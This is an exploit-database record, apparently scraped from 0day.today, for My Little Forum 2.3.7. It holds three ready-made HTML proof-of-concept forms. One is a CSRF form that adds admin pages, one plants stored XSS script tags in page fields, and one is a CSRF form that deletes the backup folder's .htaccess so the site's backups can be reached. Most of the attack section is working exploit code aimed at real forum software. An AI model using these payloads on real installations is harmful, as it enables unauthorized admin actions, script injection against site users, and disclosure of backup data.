{"id": "1337DAY-ID-26198", "type": "zdt", "bulletinFamily": "exploit", "title": "My Little Forum 2.3.7 - Multiple Vulnerabilities", "description": "Exploit for php platform in category web applications", "published": "2016-11-02T00:00:00", "modified": "2016-11-02T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/26198", "reporter": "Ashiyane", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-04T11:06:58", "viewCount": 8, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://0day.today/exploit/26198", "sourceData": "Title:\r\n======\r\nMy Little Forum 2.3.7 - Multiple Vulnerability\r\n \r\n \r\nProduct & Service Introduction:\r\n===============================\r\nMy little forum is a simple PHP and MySQL based internet forum that \r\ndisplays the messages in classical threaded view (tree structure). It is \r\nOpen Source licensed under the GNU General Public License. The main \r\nclaim of this web forum is simplicity. Furthermore it should be easy to \r\ninstall and run on a standard server configuration with PHP and MySQL.\r\n \r\n \r\nSoftware Link:\r\n==============\r\nhttps://github.com/ilosuna/mylittleforum/archive/master.zip\r\n \r\n \r\nVulnerability Type:\r\n=========================\r\nCross-Site Request Forgery\r\nStored Cross-Site Scripting\r\nCSRF Allow To Backup Disclosure\r\n \r\n \r\nVulnerability Details:\r\n==============================\r\nThis WebApplication is vulnerable and suffer from some vulnerablity.\r\n \r\n \r\nSeverity Level:\r\n===============\r\nHigh\r\n \r\n \r\nProof of Concept (PoC):\r\n=======================\r\n1. CSRF (Add Page)\r\nWith this exploit can add page in webapp.\r\n<form \r\naction=\"http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page\" \r\nmethod=\"post\" accept-charset=\"utf-8\">\r\n<input type=\"hidden\" name=\"mode\" value=\"admin\">\r\n<input type=\"hidden\" name=\"title\" value=\"Title\">\r\n<input type=\"hidden\" name=\"content\" value=\"Content\">\r\n<input type=\"hidden\" name=\"menu_linkname\" value=\"Name\">\r\n<input type=\"submit\" name=\"edit_page_submit\" value=\"OK - Save page\">\r\n</form>\r\n \r\n \r\n2. Stored XSS:\r\n<form \r\naction=\"http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page\" \r\nmethod=\"post\" accept-charset=\"utf-8\">\r\n<input type=\"hidden\" name=\"mode\" value=\"admin\">\r\n<input type=\"hidden\" name=\"title\" value=\"Stored XSS \r\n<script>alert(1)</script>\">\r\n<input type=\"hidden\" name=\"content\" value=\"Stored XSS \r\n<script>alert(2)</script>\">\r\n<input type=\"hidden\" name=\"menu_linkname\" value=\"Stored XSS \r\n<script>alert(3)</script>\">\r\n<input type=\"submit\" name=\"edit_page_submit\" value=\"OK - Save page\">\r\n</form>\r\n \r\n3. Backup Disclosure:\r\nwith this exploit we can delect htaccess in backup folder for access to \r\nbackups.\r\n<form action=\"http://localhost/mylittleforum-master/index.php\" \r\nmethod=\"post\" accept-charset=\"utf-8\">\r\n<div>\r\n<input type=\"hidden\" name=\"mode\" value=\"admin\">\r\n<input type=\"hidden\" name=\"delete_backup_files[]\" value=\".htaccess\">\r\n<input type=\"submit\" name=\"delete_backup_files_confirm\" value=\"OK - \r\nDelete\">\r\n</div>\r\n</form>\r\nNext use exploit go to:\r\nhttp://localhost/mylittleforum-master/backup/\n\n# 0day.today [2018-01-04] #", "_state": {"dependencies": 1647589307, "score": 0}}

{}